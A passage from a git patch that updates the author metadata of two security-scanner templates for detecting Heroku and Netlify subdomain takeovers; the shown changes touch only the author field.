directories, 1596 files**. From d2970f3529e9ad17d0d42fb04c27b02361aeb45e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:55:56 +0530 Subject: [PATCH 132/132] misc changes --- takeovers/heroku-takeover.yaml | 2 +- takeovers/netlify-takeover.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 4a6ac2476e..a6e03e96ac 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -2,7 +2,7 @@ id: heroku-takeover info: name: heroku takeover detection - author: 0xPrial + author: 0xPrial,pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml index 02ec1285a5..58c0306995 100644 --- a/takeovers/netlify-takeover.yaml +++ b/takeovers/netlify-takeover.yaml @@ -2,7 +2,7 @@ id: netlify-takeover info: name: netlify takeover detection - author: 0xPrial + author: 0xPrial,pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz